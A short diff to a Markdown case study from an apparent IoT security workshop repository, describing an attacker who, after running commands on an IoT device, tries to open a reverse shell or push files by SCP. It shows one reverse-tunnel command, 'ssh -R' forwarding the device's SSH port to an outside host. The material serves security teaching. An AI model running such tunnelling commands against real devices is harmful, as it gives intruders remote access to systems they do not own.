LiuYuancheng/IT_OT_IoT_Cyber_Security_Workshop/IoT_System_Attack_Case_Study/IoT_Attack_Case_Study_02/IoT_Attack_Case_Study_02.md

 #### Bypass IoT Authorization and Implement Local File Hijacking Attack

-Having successfully executed commands on the IoT device, the next step the attacker want to try is to create a reverse shell or transfer files using SCP.
+Having successfully executed commands on the IoT device, the next step attacker wants to try is to create a reverse shell or transfer files to IoT device using SCP.
 Let's first attempt the reverse shell command:

 ```
 ssh -R 0.0.0.0:7070:localhost:22 172.23.155.1